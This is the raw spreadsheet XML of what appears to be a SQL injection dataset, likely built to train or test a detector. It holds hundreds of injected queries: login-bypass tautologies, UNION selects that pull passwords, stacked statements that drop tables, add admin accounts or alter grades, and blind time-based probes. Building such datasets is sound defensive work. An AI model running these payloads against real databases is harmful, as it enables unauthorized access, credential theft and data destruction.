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nokporn\Documents\SQL Injection\Dataset\2\Excel Workbook\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="15345" windowHeight="4635"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="ActiveRow">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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="521" uniqueCount="521">
  <si>
    <t>SQL Query</t>
  </si>
  <si>
    <t>union</t>
  </si>
  <si>
    <t>Two Single Quote</t>
  </si>
  <si>
    <t>Three Single Quote</t>
  </si>
  <si>
    <t>Double Quote</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = 'ddd' compute sum(username)--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' 1\\'1-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' 1 AND 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' hi' or 1=1 --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' 'sqlvuln' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''union select 1,2,3,x,x,x,x,@@version,x--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''; DROP table Username --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 0=0 --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = '' union select password from users where name = 'Robin' --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or a=a--' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, ' union select password from users where name = 'Robin' -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT 1,2, 1\\'1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''; TRUNCATE TABLE Username; --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''ddd"' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = '' union select password from users --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' or 'a' = 'a' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * from user where id =' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT 1,2, ddd' union select username,password from students -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = '"' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') --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</si>
  <si>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</si>
  <si>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* FROM customers WHERE username = ''union select 1,2,3,x,x,x,x,@@version,x--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' hi' or 1=1 --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 1 EXEC XP_ ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = 'ddd' group by (studentid)--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' '' '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1 AND USER_NAME() = \'dbo\'-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes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</si>
  <si>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email from users where email = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='"'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' '' '</t>
  </si>
  <si>
    <t>SELECT * from username where type = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' 1 OR 1=1-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or a=a--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' 1\\'1-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''union select all 1,2,x,x,x,x --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' a' or 1=1--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id =''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * from user where id ='' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT 1,2, a' waitfor delay '0:0:10'-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='ddd' group by (password)--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 1=1--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 0=0 #' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' 1 AND USER_NAME() = \'dbo\'-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from user where id =''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' 1 AND 1=1-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from user where id ='ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''; DROP table Username --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''ddd"' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT 1,2, ddd' compute sum(username)-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 1=1--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31' AND password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from username where type = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' 1' AND non_existant_table = '1 ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or a=a--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' OR 1=1-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='ddd' compute sum(username)--' and password=''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' a' or 'a' = 'a' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' OR 1=1-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' and password=''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' compute sum(username)--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 0=0 -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' a' waitfor delay '0:0:10'--' OR 1=1'-- AND Pass=?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</si>
  <si>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</si>
  <si>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email from users where email = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' 1\\'1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 0=0 --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username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</si>
  <si>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1,2, ddd' group by (password)-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' OR username IS NOT NULL OR username = ' ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' group by (studentid)--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = 'ddd' group by (password)--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='' union select password from users where name = 'Robin' --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 1 UNION SELECT ALL FROM WHERE--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 'x'='x' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'ddd' union select username from students --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' admin'-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''ddd"' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 'a'='a FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='"' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from user where id =' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' 1 AND USER_NAME() = \'dbo\'-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT 1,2, ' OR 1=1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 1 EXEC XP_ ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 'x'='x FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' hi' or 1=1 --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 0=0 #' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' 'sqlvuln' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '' '</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * from user where id ='ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from user where id ='' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' 'sqlvuln' and password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' admin'-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1\\'1-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 0=0 # FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' waitfor delay '0:0:10'--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='ddd' group by (password)--'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</si>
  <si>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user_name='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/' and password='';</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 1 EXEC XP_ ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' a' or 1=1--' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = 'ddd' union select username,password from students --' AND password = ''</t>
  </si>
  <si>
